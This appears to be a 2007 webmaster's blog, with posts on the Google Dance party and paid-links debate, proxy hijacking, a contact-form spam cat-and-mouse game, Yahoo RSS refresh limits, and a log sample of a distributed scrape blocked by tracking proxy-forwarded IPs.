The Google Dance never fails to impress me as Google knows how to throw one hell of a party with enough food and drink to feed a small army (which it was, huge crowd) and some DJ's rocking the house.

Just to become a typical name dropping whore, in no particular order, I'll tell you I ran into Brett Tabke, Danny Sullivan, Matt Cutts, John Andrews, Jon Glick (become.com), Bob, Phil, Evan (Google Webspam guy, works with Matt), and a bunch of other people I can't remember off the top of my head. Earlier in the day in the SES exhibit hall had a nice chat with Brian Prince of BOTW and Lawrence Coburn of RateitAll and I spotted ShoeMoney hanging out at the WebmasterRadio booth but didn't get a chance to say "Hi!" even. Martinibuster was supposedly running around the Google Dance but we didn't spot him.

Everyone was talking about the highs and lows of the last Google update as many people got by unscathed. Some, like myself, are experiencing phenomenal traffic improvements but everyone had a story of someone they knew that took a swan dive and is now in the bottom of the Google barrel.

The hot topic of the day which was quite the buzz at the Google Dance was an SES session about paid links where some described it at a near revolt (riot) of the masses against Matt Cutt's stating the Google company line about paid links. Play the video on SER, pretty funny.

I hate to be a complainer because it was a great party but I have a couple of minor gripes that maybe Google can address next year:

  1. Put some trash cans near the food and beverage stations. We had to walk all over the place trying to find trash cans, which is no fun with a busted up toe, just so we could be good guests and not litter the place.
  2. SUPPLY SOME TOOTHPICKS! Maybe you had them, but I sure couldn't find them, and spent half the night trying to get a stuck kernel of corn out from between my teeth.
Other than those 2 nit picky things, well done again this year Google!

Thursday, August 16, 2007

Dan Thies Lights Fire Under Google for Proxy Hijacking

I've discussed Google proxy hijacking many times before in this very blog, even joked about it.

Now Dan Thies has done an excellent post about the problem appropriately entitled "Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs".

Dan's post is complete with visual aids for those having trouble grasping how it works and even links to some sites with PHP code to help alleviate the problem.

Read a detailed account of just how easily it is to have the deadly combination of Google and a proxy server turn your website's ranking in Google literally upside down as you get a duplicate content penalty for your own pages, and worse!

Run, do not walk, to read Dan's post and tell all your friends as this information could save many websites from a sudden and untimely demise in Google.

Thursday, August 09, 2007

CONTACT US Form Spammers Monitor Submit Results!

I have one CONTACT US form on a website that I leave less protected than other forms just to allow customers with their browser security dialed up tight to drop a line without getting caught in anti-spam snares.

Mind you, this page only sends an email to ME, nothing public, nothing nobody will ever see as I sure as hell won't look at the spam other to delete it, so it gives them ZERO value for their efforts, yet they persist.

So in the beginning there was a small trickle of spam on this form that started to escalate.

The first thing I did ages ago was I changed to the form to require a POST just to thwart them from their simple GET's dumping junk.

Eventually they switched to use a POST, but that means someone was monitoring response codes, but WHY?

The trickle of spam eventually came back.

So I changed a couple of fields just to alter the process and break their auto-spam tool.

A long nice quite period but obviously someone is watching and they adapted yet again.

Fine, so I made it a requirement that the page rejected the post unless they had accessed some other page on my site first, which would be a normal user thing.

This caused a longer period of blissful silence.

Then here comes the spam yet AGAIN!

OK, fine, let's try embedding something in the page unique per visitor so if you don't get the CONTACT US page first, and use that parameter, it will reject the submit.

This just blew my fucking mind when a few days later they adapted to first get the page, get all parameters from the form, then POST the page!

OK, now we know someone is fucking watching this page...

Fine.

I made a change that you can't see in the HTML, it's all server side, knock your fucking socks off trying to adapt this time.

I still don't see why the spammers would bother as they're just wasting time.

Nobody will ever see their spams, NEVER EVER, but I can play this cat and mouse game as long as they can.

All this trouble just because I didn't want to annoy visitors with a captcha on a single page, or require cookies or javascript to be enabled.

If they push me too hard the captcha gets installed.

FYI, I'm watching the someone trying to fix their form post to my site as I'm writing this. They've made about 10 attempts now and it's still not getting through. This must be making him nuts as I don't give them any clues why the submit isn't working except a generic error that the submit failed and please try again!

Let's see what happens next...

UPDATE: The spambots were hammering away at that forum trying to figure out what I did for days with literally hundreds of post attempts from a couple of IPs. Probably the spambot herder trying to figure out my latest anti-spam hack. Then it stopped, not a single POST from those sources and it's back to normal with only real posts from humans.

Sunday, August 05, 2007

Yahoo's RSS Feed Refresh is SLOW!

One of my sites has a dynamic RSS feed and it sends a refresh ping to Yahoo every time new content is added to the feed. Sometimes the content is added slowly over the course of the day, sometimes content is added more rapidly and new items are added to the feed almost back to back.

The code managing the feed is simple in that it simply updates the RSS feed and pings all the refresh services in real time as the data becomes available.

If you add more than one item in a minute or two what does Yahoo say?

Refresh failed: Too soon http://www.mysite.com/myfeed.xml
Too soon for what?

Too soon for more new content?

Too soon for your crappy refresh servers to keep pace with reality.

Why don't you just queue it up because I've already told you that the content you previously had is already OUT OF DATE but noooooooo, it's TOO SOON to refresh because we're Yahoo and we have silly rules in place to protect our fragile servers.

Well guess what?

You need a new error called: "TOO LATE!" as your version of the feed is older than everyone else's that could keep up.

As a matter of fact I thought I'd try it ONE MORE TIME as I figured in the time it took to type this blog post that Yahoo would've allowed the RSS feed update by now so I manually pinged their server and you guessed it "TOO SOON! TOO SOON! WE'RE YAHOO AND WE CAN'T KEEP UP!"

Sheesh.

Tuesday, July 31, 2007

Attempted Distributed Scrape from SAIX.net

This is the kind of scrape attack I warn my bot blocking comrades in arms that they would probably miss because it's distributed over multiple IP addresses. Had the scraper not left the default user agent "Java/1.6.0_02" most of the anti-scrapers would be helpless against this type of scrape.

Here's a sample of the activity:

198.54.202.246 [ctb-cache7-vif1.saix.net.] requested 3 pages as "Java/1.6.0_02"
198.54.202.194 [ctb-cache4-vif1.saix.net.] requested 1 pages as "Java/1.6.0_02"
196.25.255.210 [rba-cache2-vif0.saix.net.] requested 3 pages as "Java/1.6.0_02"
198.54.202.195 [ctb-cache5-vif1.saix.net.] requested 3 pages as "Java/1.6.0_02"
196.25.255.218 [rrba-ip-pcache-6-vif0.saix.net.] requested 4 pages as "Java/1.6.0_02"
198.54.202.214 [rrba-ip-pcache-5-vif1.saix.net.] requested 4 pages as "Java/1.6.0_02"
196.25.255.195 [ctb-cache5-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
198.54.202.210 [rba-cache2-vif1.saix.net.] requested 2 pages as "Java/1.6.0_02"
198.54.202.218 [rrba-ip-pcache-6-vif1.saix.net.] requested 2 pages as "Java/1.6.0_02"
196.25.255.214 [rrba-ip-pcache-5-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
198.54.202.234 [rba-cache1-vif0.saix.net.] requested 3 pages as "Java/1.6.0_02"
196.25.255.194 [ctb-cache4-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
196.25.255.250 [ctb-cache8-vif0.saix.net.] requested 1 pages as "Java/1.6.0_02"
This is a prime example of why standard bot blocking that only takes a single IP address would fail because these are all proxy servers that claim to be forwarding on behalf of 41.240.133.235 [dsl-240-133-235.telkomadsl.co.za].

Assuming these script kiddies fix the default UA all that needs to be done to stop them is track access based on the proxy forward IP, which I do, which makes stopping this kind of nonsense childs play.

FYI, before anyone asks stupid questions like "How do you know it was a scraper?" it's because of the access of my pages names in sequential alphabetical order. Other than being distributed among many IPs via the SAIX caching proxy, which could be hard to identify via a log file review, the rest looked like it was amateur hour at the scraping faire.

This is why I tell people post-mortem Apache log file reviews simply don't work because there is insufficient information to identify things that my code easily catches in real time.